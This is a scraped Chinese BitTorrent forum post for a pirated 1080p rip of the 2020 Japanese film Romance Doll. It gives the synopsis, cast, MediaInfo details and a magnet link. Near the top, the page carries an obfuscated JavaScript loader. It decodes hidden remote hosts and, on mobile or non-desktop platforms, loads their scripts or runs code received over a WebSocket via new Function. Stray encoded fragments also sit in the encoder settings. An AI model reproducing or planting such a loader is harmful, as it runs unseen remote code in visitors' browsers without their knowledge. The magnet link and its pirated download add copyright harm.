爱情人偶[中文字幕].Romance.Doll.2020.1080p.NF.WEB-DL.DDP5.1.x264 4.64GB

版主小s 28天前 1088

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 爱情人偶 / 爱情人形(台) / 浪漫人偶 / Romance Doll / 恋之人形(港)
◎片  名 ロマンスドール
◎年  代 2020
◎产  地 日本
◎类  别 剧情 / 爱情
◎语  言 日语
◎上映日期 2020-01-24(日本)
◎IMDb链接 https://www.imdb.com/title/tt10914712/
◎豆瓣评分 6.3/10 (7592人评价)
◎豆瓣链接 https://movie.douban.com/subject/30446493/
◎片  长 123分钟
◎导  演 棚田由纪 Yuki Tanada (id:1319228)
◎编  剧 棚田由纪 Yuki Tanada (id:1319228)
◎演  员 高桥一生 Issey Takahashi (id:1275907)
       苍井优 Yu Aoi (id:1018990)
       古关安广 Kitar? (id:1111204)
       渡边绘里 Eri Watanabe (id:1016983)
       泷正则 Pierre Taki (id:1002495)
       滨野谦太 Kenta Hamano (id:1316095)
       三浦透子 Touko Miura (id:1333905)
       大仓孝二 Koji Ookura (id:1011644)

◎标  签 日本 / 爱情 / 2020 / 剧情 / 温情 / 女性 / 人生 / 小说改编

◎简  介
  影片改编自导演的同名小说,讲述的是制作充气娃娃的职人哲雄与其妻子园子的爱情故事:哲雄对园子一见钟情而结婚,他隐瞒着自己的真实工作普通过活,但却因过度热衷充气娃娃的制作而令夫妻关系产生危机。在这样的情况下,园子向哲雄坦白了心中怀揣着的秘密……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 210242741010803675461660283081613030006 (0x9E2B476FD6C02318FCAEFF95A4B2B276)

  4. Complete name                            : [email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.64 GiB

  8. Duration                                 : 2 h 3 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 5 368 kb/s

  11. Encoded date                             : UTC 2021-08-17 11:18:34

  12. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 2 h 3 min

  24. Bit rate mode                            : Variable

  25. Bit rate                                 : 4 726 kb/s

  26. Maximum bit rate                         : 20.0 Mb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 24.000 FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.095

  37. Stream size                              : 4.09 GiB (88%)

  38. Writing library                          : x264 core 148 r2722 1b0121b

  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=20.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default                                  : Yes

  41. Forced                                   : No


  42. Audio

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 2 h 3 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 640 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 567 MiB (12%)

  57. Title                                    : Japanese

  58. Language                                 : Japanese

  59. Service kind                             : Complete Main

  60. Default                                  : Yes

  61. Forced                                   : No


  62. Text #1

  63. ID                                       : 3

  64. Format                                   : UTF-8

  65. Codec ID                                 : S_TEXT/UTF8

  66. Codec ID/Info                            : UTF-8 Plain Text

  67. Duration                                 : 1 h 58 min

  68. Bit rate                                 : 37 b/s

  69. Count of elements                        : 1421

  70. Stream size                              : 32.5 KiB (0%)

  71. Title                                    : Chinese Simplified

  72. Language                                 : Chinese

  73. Default                                  : Yes

  74. Forced                                   : No


  75. Text #2

  76. ID                                       : 4

  77. Format                                   : UTF-8

  78. Codec ID                                 : S_TEXT/UTF8

  79. Codec ID/Info                            : UTF-8 Plain Text

  80. Duration                                 : 1 h 58 min

  81. Bit rate                                 : 37 b/s

  82. Count of elements                        : 1421

  83. Stream size                              : 32.5 KiB (0%)

  84. Title                                    : Chinese Traditional

  85. Language                                 : Chinese

  86. Default                                  : No

  87. Forced                                   : No




TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:8448A9C811A0928CDA3D9BB148946AF6A17C4867
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回